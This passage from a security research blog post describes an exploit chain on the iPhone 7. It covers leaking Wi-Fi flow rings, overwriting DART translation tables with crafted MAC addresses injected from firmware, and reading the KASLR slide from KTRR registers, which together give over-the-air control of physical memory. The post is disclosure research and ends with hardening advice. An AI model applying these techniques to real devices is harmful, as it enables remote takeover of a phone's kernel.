Normally, deleting a flow ring is a two way process; the host sends a deletion request, which is subsequently met by a corresponding message from the device, signalling a successful deletion. However, inspecting the host’s implementation of the above messages, it appears we can just as well skip the first half of the exchange, and send an unsolicited deletion response from the device:

1. uint32_t AppleBCMWLANBusPCIeInterface::completeFlowRingDeleteResponseMsg(
2. uint64_t unused, struct tx_flowring_delete_response_t* msg) {
4. //Is the ring ID within bounds?
5. if (msg->flow_ring_id < this->min_flow ||
6. msg->flow_ring_id >= this->max_flow) {
7. ...
8. }
9. //Does a flow ring exist at the given index?
10. else if (this->flow_rings[msg->flow_ring_id]) {
11. this->deleteFlowCallback(msg->status, msg->flow_ring_id);
12. ...
13. return 0;
14. }
15. else {
16. ...
17. return 0xE00002BC;
18. }
19. }
function 0xFFFFFFF006D2FD44

Doing so causes an interesting side-effect to occur: instead of completely deleting the ring, the host decrements a single reference count on the ring object, which is insufficient to bring down the total count to zero (the missing release was meant to be performed by the code responsible for sending the deletion request in the first place).

Consequently, the flow ring is left mapped into IO-Space, but is unusable by the host. As such, newly allocated flow rings cannot inhabit the same IO-Space range (as it remains occupied by the unusable ring), and must instead be carved from higher IO-Space addresses.

This primitive has several interesting side-effects.

For starters, it allows us to re-allocate flow rings, thus moving around their base addresses within the kernel’s VAS, recasting the net over potentially interesting objects within the kernel.

More importantly, however, this primitive allows us to force the allocation of a brand new DART L2 translation table. Since each L2 translation table can only map a fixed range into IO-Space, by continuously leaking flow rings we are able to exhaust the available space in the L2 table, thereby forcing DART to allocate a new table from which the next IO-Space addresses are carved.

Lastly, as luck would have it, since both the rings themselves and DART’s translation tables are carved using the same allocator (IOMalloc), and have similar sizes, they are both carved from the same “zone” of memory. Therefore, by continuously leaking IO-Space addresses and creating new flow rings until a new DART L2 translation table is formed, we can guarantee that the new table will be placed in close proximity to the following flow ring, thereby placing the L2 translation table within our primitive’s scope!

Putting it all together, we can finally reach a reliable placement of DART translation tables in close proximity to a flow ring, thereby allowing us to overwrite entries in the translation tables with flow ring items.
Flow Ring Items vs. DART Descriptors

To understand whether flow ring items make good candidates to overwrite DART descriptors, let’s take a moment to inspect their structure. As these items are present in the same form in the Android driver, we are spared the need to reverse-engineer them:

So how does the above structure relate to a DART descriptor?

As the above structure has a 64-bit aligned size, and ring items are always placed in increments of the same size, we can deduce that each quadword in the above structure will reside in a 64-bit aligned address. Similarly, DART descriptors are 64-bits wide, and are placed in 64-bit aligned addresses. Therefore, each aligned quadword in the above structure serves as a potential candidate for replacing a DART descriptor.

However, going over the above quadwords, it is quickly apparent that no fully-controlled word exists within the structure. Indeed, the first and last word are composed of mostly constant values, whereas the third and fourth contain IO-Space addresses (whose forms are incompatible with DART descriptors). Nonetheless, taking a closer look, it appears that the second word is at least somewhat malleable. Its lower six bytes are governed by the destination MAC address to which the frame is being transmitted, while the two upper bytes contain the beginning of our source MAC.

Assuming we could cause the host to send frames to a MAC address of our choosing, that would grant us control over the lower six bytes. However, the remaining two bytes are populated using our device’s MAC address, a much harder target for modification...
Spoofing The Source MAC?

To understand whether we can indeed modify the device’s MAC address, let’s take a closer look at the mechanisms through which the MAC address may be programmable on the Wi-Fi chip.

Like many production devices, Broadcom’s Wi-Fi chips allow the storage of chip-specific configuration using one of two mechanisms; either by using a block of Serial Programmable ROM (SPROM) or by utilising a set of One Time Programmable (OTP) fuses. The Wi-Fi chip present on the iPhone 7 uses the latter mechanism.

As for the host, it stores the Wi-Fi chip’s MAC address in the “device tree” (among many other device-specific properties). The “device tree” is a simple hierarchical representation of hardware components utilised by the platform (much like its Linux counterpart, bearing the same name), allowing consumers within the kernel to easily access (and populate) its nodes.

During the Wi-Fi chip’s initialisation, the AppleBCMWLANCore driver retrieves the contents of the chip’s OTP fuses (using the PCIe BARs), and proceeds to parse them according to the PCMCIA Card Information Structure (CIS) format. Reverse-engineering the parsing functions in the kernel, it is quickly apparent that one tag in particular bears significance with regards to our pursuits.

If a “Function Extension” tag is encountered in the CIS data embedded in the OTP, the kernel will extract the MAC address encapsulated within it, and insert it into the “local-mac-address” node in the device tree, representing the Wi-Fi MAC address!

Extracting the stored OTP contents from the kernel, we can see that no such element is present in the OTP contents to begin with, thus allowing us to insert our own tag without fear of causing a collision:

Wi-Fi Chip OTP

Therefore, to change the MAC address, all we’d need to do is fuse the corresponding bits into the OTP, thus inserting the new CIS tag. However, this is easier said than done. For starters, writing to the OTP is a risky operation, and may result in permanent damage to the chip if done incorrectly. Moreover, as it’s name implies, writing to the OTP is a one-time operation, leaving no room for error. Perhaps we could avoid changing the MAC after all?

After discussing the above situation, my colleague Ian Beer suggested an alternative!

Why not, instead, check if the high-order bits in the DART descriptor are actually being used for the translation process? To test this suggestion, we’ll use the research platform to insert a valid L2 descriptor into DART, with one small caveat -- we’ll change the two upper bytes in the 64-bit descriptor to “corrupted” values. After inserting the mapping, we can simply insert a DMA hook into the firmware, performing a DMA access to the aforementioned address.

Running the experiment above we are greeted with a positive result! Indeed, the upper bytes of the DART descriptor are ignored by the translation process, thus sparing us the need to modify the MAC.
Spoofing The Destination MAC

Having confirmed that modifying the source MAC is no longer a barrier, all that remains is to cause the host to send a frame to a crafted MAC address, thus allowing us to control the six significant bytes within our 64-bit word.

Naturally, one way to solicit a response from the host is to transmit an ICMP Echo Request (ping) to it, subsequently triggering a corresponding ICMP Echo Response to be sent in response. While this approach can easily trigger the transmission of frames from the host, it only allows frames to be transmitted to known destinations, but does not offer control over the destination MAC.

To trigger communications to our target MAC, we’ll first launch an ARP Spoofing attack; sending a crafted ping from an arbitrary (unused) IP address, thereby causing the host to send an “ARP Request” querying the MAC address of the crafted IP, to which we’ll respond a response encoding our own MAC address, thus associating the IP address with a crafted MAC value.

However, several problems arise when using this method. First, recall that the MAC address is meant to masquerade as a valid DART L2 Descriptor. As we’ve seen in our analysis of the descriptor formats, every valid L2 descriptor must have the two least-significant bits set. This poses somewhat of a problem for MAC addresses, as their bottom bits bear special significance:

Setting the bottom two bits in the MAC address would indicate that it is a broadcast / multicast address. As we are sending unicast traffic (and are expecting a unicast response), it might be difficult to solicit such responses from the host. Furthermore, any network-resident security devices might inspect the traffic and flag it as suspicious (especially as we are executing a classical ARP spoofing attack). What’s more, the router or access point may refuse to route unicast traffic to a broadcast MAC.

To get around the above limitations, we’ll simply inject the traffic directly from the firmware, without transmitting it over the air. To achieve this goal, we’ve written a small assembly stub that, when executed on the firmware, injects the encapsulated frames directly into the host, as if it were transmitted over the network.

This allows us to inject even potentially malformed traffic that would not have been routable (like unicast traffic from a broadcast MAC). Indeed, after running the ARP spoofing vector with the above mechanism, we are able to solicit responses from the host to our crafted (broadcast) MAC address (XNU does not object to sending unicast traffic to broadcast MACs). Great!


Finally, all the ducks are lined up in a row -- we can solicit traffic to MAC addresses of our choosing (even broadcast MACs), without having to modify the source MAC. Furthermore, we can shape IO-Space in order to force a new DART translation table to be allocated following a flow ring within the kernel’s VAS. Therefore, we can overwrite DART descriptors with our own crafted values, thus introducing new mappings into IO-Space. However, a single question remains -- which physical address should we map into IO-Space?

After all, we still haven’t dealt with the issue of KASLR. As the kernel’s loading addresses, both physical and virtual, are “slid” using a randomised value, we cannot locate physical addresses within the kernel until we uncover the slide’s value. If we cannot reliably locate the kernel’s base address, which physical addresses can we find?

To get around this limitation, we’ll use one more trick! While the host’s physical address space houses the DRAM, in which the kernel and application memory are stored, additional regions of physically addressable content can also be found in the PAS. For instance, hardware registers are mapped into fixed physical addresses, allowing the host to interact with peripherals on the SoC. Among these peripherals is DART itself!

As we’ve previously seen, DART’s translation process is initiated using four “L0 descriptors”. These descriptors are fed into DART’s hardware registers, denoting the base addresses of the translation tables from which the IO-Space translation process begins. If we were to map in DART’s hardware registers into IO-Space, we could either read the descriptors, thus allowing us to locate DART’s translation tables within the physical address space!

It should be noted that although DART’s hardware registers are addressable within the host’s physical address space, it remains unknown why IO-Space mappings should even be allowed to include ranges beyond the DRAM’s bounds. Indeed, it stands to reason that such mappings would be prohibited by the hardware. However, as it happens, no such restriction is enforced - DART freely allows any physical range to be inserted into IO-Space.

Therefore, if we wish to map-in DART’s own hardware registers into IO-Space, all that remains is to locate the physical ranges corresponding to DART’s hardware registers! To do so, we’ll use a combined approach.

First, we’ll use our research platform to extract the DART instance, from which we can subsequently retrieve the kernel VAS pointer corresponding to DART’s hardware registers. Then, using our translation table module, we can proceed to convert the kernel virtual address to its matching physical range. After doing so, we are presented with the following result:

Great! The address is clearly not within the DRAM’s range, hinting that we’re on the right track.

To verify whether this is indeed the correct address, we’ll use a second approach. As we already noted, the device hierarchy is stored within a structure called the “device tree”. Different properties relating to each peripheral, include the addresses of their corresponding hardware registers, are stored as nodes within this tree.

The device tree itself is present in a binary format within the firmware image (encapsulated in an IMG4 container). After extracting the device tree, we are presented with a blob storing the device hierarchy. Although the tree’s format is undocumented, inspecting the binary reveals an extremely simple structure; a fixed header denoting the number of children and entries contained in each node, followed by a fixed-length name, and a variable-length value. I later discovered that Jonathan Levin has similarly reversed this structure, and has written a tool to parse out its contents (albeit for an IMG3 container) -- you can check out his script here.

Regardless, after writing our own python script to parse the device tree, we are presented with the following result:

Ah-ha! We once again find the same physical address, thus concluding that our analysis of DART’s hardware registers is correct.

Putting it all together, we can now utilise our exploit primitive to map the physical address containing DART’s registers into IO-Space. Once mapped, we can proceed to read the hardware registers’ values, including the L0 descriptors. It should be noted that attempting to access the hardware registers from the host requires strict 32-bit load and store operations -- attempting a 64-bit load from the hardware registers results in a garbled value being returned. Curiously, however, DMA-ing to and from the hardware registers from the Wi-Fi chip goes unhindered!

Using the L0 descriptor, we can now extract the physical address of the next translation table in DART’s hierarchy. Then, by repeating the exploit primitive and mapping-in the newly discovered physical address into IO-Space, we can repeat the process, descending down DART’s translation hierarchy until we reach a DART L2 translation table. Thus, using one flow ring, we can bring them all, and in IO-Space bind them.

Once an L2 translation table is located within the physical address space, we can proceed to map it into IO-Space using our exploit primitive one last time, thus inserting DART’s own translation table into IO-Space!

By mapping DART’s translation table into its own IO-Space ranges, we can now utilise DMA access from the Wi-Fi chip in order to freely introduce new mappings into IO-Space (removing the need for the exploit primitive). Thus, gaining full control over the host’s physical memory!

Furthermore, as DART’s translation entries are never cleared, we are guaranteed that once the malicious IO-Space entries are inserted, they remain accessible to the Wi-Fi chip, until the device itself reboots. As such, the exploit process need only occur once in order to introduce a backdoor allowing the Wi-Fi chip to freely access the host’s physical memory.

One curiosity of note is that DART’s has a rather large TLB. Therefore, changes in IO-Space may not immediately be reflected until the entries are evicted from the cache. Nonetheless, this is easily dealt with by mapping in IO-Space addresses in a circular pattern, thus allowing stale entries to get cleared.
Finding The KASLR Slide

At long last, we have complete control over the entire physical address space, directly from the Wi-Fi chip. Consequently, we can proceed to map and and modify any physical address we desire, even those corresponding to the kernel’s data structures.

While this form of access is sufficient in order to subvert the kernel, there’s one tiny snag we have yet to deal with: KASLR. Since the kernel’s physical base address is randomised using the KASLR slide, and we have yet to deduce its value, we might have to resort to scanning the DRAM’s physical address ranges until we locate the kernel itself.

This approach is rather inefficient. Instead, we can opt for a more elegant path. Recall that, as we’ve just seen, hardware registers may be freely mapped into IO-Space. As hardware registers are not affected by the KASLR slide (indeed they are mapped at fixed physical addresses), they can be trivially located regardless of the current “slide” value.

Perhaps one of the hardware registers can be used as an oracle to deduce the KASLR slide?

Recall that newer devices, such as the iPhone 7, enforce the integrity of the kernel using a hardware mechanism dubbed “KTRR”. Simply put, this mechanism allows the device to provide “lockdown” regions, to which subsequent modifications are prohibited. These regions are programmed using a special set of hardware registers.

Amusingly, this very same mechanism can be used to deduce the KASLR slide!

By mapping in physical addresses corresponding to the aforementioned hardware registers, we can proceed to read their contents directly from IO-Space. This, in turn, reveals the physical ranges encoded in the “lockdown registers”, which store non other than the kernel’s base address.

The Exploit

Summing up all of the above, we’ve finally written an exploit, allowing full control over the device’s physical memory over-the-air, using Wi-Fi communication alone. You can find the exploit here.

It should be noted that several smaller details have been omitted from the blog post, in the interest of (some) brevity. For instance, locating the offset between the newly allocated DART translation table and the flow ring requires a process of probing various IO-Space addresses, while also guaranteeing that alignment constraints enforced by the granularity of ring item sizes are met. We encourage researchers to read the exploit’s code in order to discover any such omitted parts.

The exploit has been tested against the iPhone 7 running iOS 10.2 (14C92). The vulnerabilities are present in versions of iOS up to (and including) iOS 10.3.3. Researchers wishing to utilise the exploit on different iDevices or different versions, would be required to adjust the symbols used by the exploit.

Upon successful execution, the exploit exposes APIs to read and write the host’s physical memory directly over-the-air, by mapping in any requested address to the controlled DART L2 translation table, and issuing DMA accesses to the corresponding mapped IO-Space addresses.

For convenience sake, the exploit also locates the kernel’s physical base address using the method we described above (using the KTRR read-only region registers), thus allowing researchers to easily explore the kernel’s physical memory ranges.

Over the course of this series of blog posts, we’ve explored the security of the Wi-Fi stack on Apple devices. Consequently, we constructed a complete exploit chain, allowing attackers to reliably gain control over the iOS kernel on an iPhone 7 using Wi-Fi communication alone.

During our research, we explored several components, including Broadcom’s Wi-Fi firmware, the DART IOMMU, and Apple’s Wi-Fi drivers. Each of the aforementioned components is proprietary, thus requiring substantial effort to gain visibility into their operations. We hope that by providing the tools used to conduct our research, additional exploration of these surfaces will be performed in the future, allowing for their corresponding security postures to be enhanced.

We’ve also seen how the iPhone utilises hardware security mechanisms, such as DART, in order to provide isolation between the host and potentially malicious components. These mechanisms significantly raise the bar for launching successful attacks targeting the host. Nonetheless, additional research into DART is needed in order to explore all facets of its implementation. For instance, while we’ve explored the enacted IO-Space through the prism of the Wi-Fi chip, additional PCIe components exist on the SoC, which are similarly guarded by DARTs. These components remain, as of yet, unexplored.

Apart from fixing individual vulnerabilities in the security boundaries between the host and the Wi-Fi chip, several structural enhancements can be applied to make future exploitation harder. This includes introducing read-only mappings to DART (if they are not already present), clearing unused descriptors from DART’s translation tables upon rebooting the associated component, and preventing IO-Space mappings from exposing physical ranges beyond the DRAM.

Lastly, while memory isolation goes a long way towards defending the host against a rogue Wi-Fi chip, the host must still consider all communications originating from the Wi-Fi chip as potentially malicious. To this end, the numerous communication channels between the two endpoints (including event packets, “ioctls”, and control commands), must be designed to withstand malformed data transmitted by the chip.